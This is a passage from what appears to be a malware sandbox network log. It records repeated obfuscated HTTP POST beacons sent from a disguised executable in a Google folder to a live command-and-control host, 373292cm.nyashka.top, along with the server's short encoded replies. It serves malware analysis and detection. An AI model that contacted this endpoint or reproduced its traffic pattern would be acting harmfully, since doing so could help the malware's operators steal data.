                                    Aug 25, 2024 15:46:47.472341061 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:47.472657919 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:46 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[
                                    Aug 25, 2024 15:46:47.472697973 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:46 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    76192.168.2.84978980.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:47.609419107 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2536
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:47.966728926 CEST2536OUTData Raw: 5a 52 5c 50 54 45 51 59 5b 5f 5a 51 59 57 58 54 57 5d 5d 5f 57 5a 53 5d 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZR\PTEQY[_ZQYWXTW]]_WZS]YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.];#,6#7=[=??(=",7P#8<(4V=,&F$.Y/)
                                    Aug 25, 2024 15:46:48.292366982 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:48.491179943 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:47 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    77192.168.2.84979080.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:48.622334957 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:48.980273008 CEST2544OUTData Raw: 5f 55 59 57 51 42 54 5d 5b 5f 5a 51 59 52 58 5f 57 5d 5d 5a 57 5e 53 5c 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _UYWQBT][_ZQYRX_W]]ZW^S\YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,3!=4^# &)0_<%Z+8#<74!S(:+_"3>/>&F$.Y/1


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    78192.168.2.84979180.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:49.298795938 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1860
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:49.652107954 CEST1860OUTData Raw: 5f 5d 59 55 51 45 51 5b 5b 5f 5a 51 59 56 58 5f 57 50 5d 5b 57 5a 53 54 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _]YUQEQ[[_ZQYVX_WP][WZSTYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.X;E6-<"3&)[4_<X9(>7[7,7'(<7X,.&F$.Y/!
                                    Aug 25, 2024 15:46:49.969765902 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:50.098026991 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:49 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 52 2a 1c 2a 11 32 38 2c 53 25 30 21 0d 2a 03 0a 07 29 04 3a 06 33 3b 35 5f 26 3e 38 1d 30 05 35 11 29 3d 36 14 26 2f 3f 59 39 24 2b 5d 0c 13 22 14 20 3a 29 01 26 2f 2b 01 2b 2b 2c 06 21 3f 35 05 28 14 03 55 2b 01 33 01 3c 2a 3f 59 3c 03 31 0b 2c 06 25 5d 3a 20 32 51 37 3e 2b 52 0d 11 27 0a 3f 3e 21 53 3d 2e 33 58 36 28 0d 5b 33 03 21 09 26 32 3a 10 24 07 0a 5c 31 31 26 08 27 08 29 55 24 3b 22 11 32 3f 39 1f 36 18 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &R**28,S%0!*):3;5_&>805)=6&/?Y9$+]" :)&/+++,!?5(U+3<*?Y<1,%]: 2Q7>+R'?>!S=.3X6([3!&2:$\11&')U$;"2?96#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    79192.168.2.84979280.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:49.423856020 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:49.777689934 CEST2544OUTData Raw: 5f 5c 5c 54 54 47 51 5c 5b 5f 5a 51 59 54 58 52 57 51 5d 5b 57 51 53 5c 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _\\TTGQ\[_ZQYTXRWQ][WQS\YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.86=_#35\>0<?=8 <' #*)'_#6,>&F$.Y/)
                                    Aug 25, 2024 15:46:50.090866089 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:50.289326906 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:49 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    80192.168.2.84979380.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:50.527050972 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:50.886480093 CEST2544OUTData Raw: 5f 57 5c 56 54 42 54 5e 5b 5f 5a 51 59 53 58 52 57 5d 5d 5f 57 5b 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _W\VTBT^[_ZQYSXRW]]_W[SUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,3"$ 3!X*+?.)^<>;# !<(9<#02;>&F$.Y/5
                                    Aug 25, 2024 15:46:51.210019112 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:51.351440907 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:50 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    81192.168.2.84979480.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:51.483489037 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:51.839732885 CEST2544OUTData Raw: 5a 57 5c 55 54 42 54 5d 5b 5f 5a 51 59 51 58 5e 57 51 5d 5b 57 5f 53 59 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZW\UTBT][_ZQYQX^WQ][W_SYYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.8/@#= 6><X+.5+.'[#+V#/+9$ #*/>&F$.Y/=
                                    Aug 25, 2024 15:46:52.148564100 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:52.350153923 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:51 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    82192.168.2.84979580.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:52.482831955 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:52.941916943 CEST2544OUTData Raw: 5f 54 5c 50 54 43 54 50 5b 5f 5a 51 59 54 58 55 57 51 5d 5f 57 58 53 5a 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _T\PTCTP[_ZQYTXUWQ]_WXSZYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,U;5=4]"0X),^((7??R43(9873)\8&F$.Y/)
                                    Aug 25, 2024 15:46:53.147959948 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:53.281999111 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:52 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    83192.168.2.84979680.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:53.403580904 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:53.764377117 CEST2544OUTData Raw: 5f 56 5c 55 51 44 54 58 5b 5f 5a 51 59 56 58 54 57 5b 5d 53 57 59 53 5a 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _V\UQDTX[_ZQYVXTW[]SWYSZYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.],;D#>< :)[ ]>>=^?>; <7Q4" (:#_"35^,>&F$.Y/!
                                    Aug 25, 2024 15:46:54.091018915 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:54.221483946 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    84192.168.2.84979780.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:54.341687918 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:54.699183941 CEST2544OUTData Raw: 5f 55 5c 5f 54 46 51 5b 5b 5f 5a 51 59 51 58 55 57 5b 5d 59 57 58 53 5b 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _U\_TFQ[[_ZQYQXUW[]YWXS[YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q..3#A"['435*[4_?X&+[$ #R '(_#] %Y,>&F$.Y/=
                                    Aug 25, 2024 15:46:55.007900000 CEST25INHTTP/1.1 100 Continue


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    85192.168.2.84979880.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:55.112500906 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1840
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:55.467030048 CEST1840OUTData Raw: 5a 55 59 53 51 42 54 5c 5b 5f 5a 51 59 53 58 51 57 59 5d 53 57 58 53 5d 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZUYSQBT\[_ZQYSXQWY]SWXS]YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-/0,"$739*=+:(>7Y7<#P#$Q<:+4V6/&F$.Y/5
                                    Aug 25, 2024 15:46:55.787245989 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:56.013691902 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:55 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 25 0a 3d 25 32 5c 32 3b 28 53 30 0d 2a 52 2b 3d 3b 59 3e 3d 3a 06 24 06 21 15 31 00 33 0f 27 15 29 11 3f 58 2a 19 32 06 2f 11 3a 1e 2b 5d 0c 13 22 59 20 5c 2a 58 26 2c 28 5b 3d 16 3f 18 20 2c 0b 02 3c 3a 0c 0d 3f 2f 2b 06 3c 5f 34 04 2b 14 22 53 3b 01 25 5d 3a 30 22 13 34 14 2b 52 0d 11 24 57 2b 13 0c 0c 29 58 3b 58 35 16 2f 5a 27 04 2e 1d 26 31 32 56 24 00 3f 02 25 0c 32 0f 27 32 2a 0d 32 05 32 12 27 2c 35 1f 36 22 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: %=%2\2;(S0*R+=;Y>=:$!13')?X*2/:+]"Y \*X&,([=? ,<:?/+<_4+"S;%]:0"4+R$W+)X;X5/Z'.&12V$?%2'2*22',56"#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    86192.168.2.84979980.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:55.237709999 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:55.603245974 CEST2544OUTData Raw: 5a 51 5c 54 51 43 51 5d 5b 5f 5a 51 59 54 58 5e 57 50 5d 59 57 50 53 5d 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZQ\TQCQ][_ZQYTX^WP]YWPS]YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q./#"=\" 2*-^>>%+[7"<S W,?4 5^,.&F$.Y/)
                                    Aug 25, 2024 15:46:55.907500029 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:56.038980007 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:55 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    87192.168.2.84980080.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:56.169519901 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:56.527101994 CEST2544OUTData Raw: 5a 51 59 52 54 49 54 5e 5b 5f 5a 51 59 50 58 52 57 59 5d 59 57 5a 53 5a 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZQYRTIT^[_ZQYPXRWY]YWZSZYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.].0$"?#=]==0<>:< ,#"?+']40!;.&F$.Y/
                                    Aug 25, 2024 15:46:56.854744911 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:56.990062952 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    88192.168.2.84980180.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:57.127860069 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:57.483325005 CEST2544OUTData Raw: 5f 5d 5c 51 54 48 51 5b 5b 5f 5a 51 59 54 58 5f 57 50 5d 5f 57 5c 53 5e 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _]\QTHQ[[_ZQYTX_WP]_W\S^YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q._/(">;73!>>7+6+;X",,#W8R+#/&F$.Y/)
                                    Aug 25, 2024 15:46:57.793273926 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:57.925843954 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    89192.168.2.84980280.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:58.335057974 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
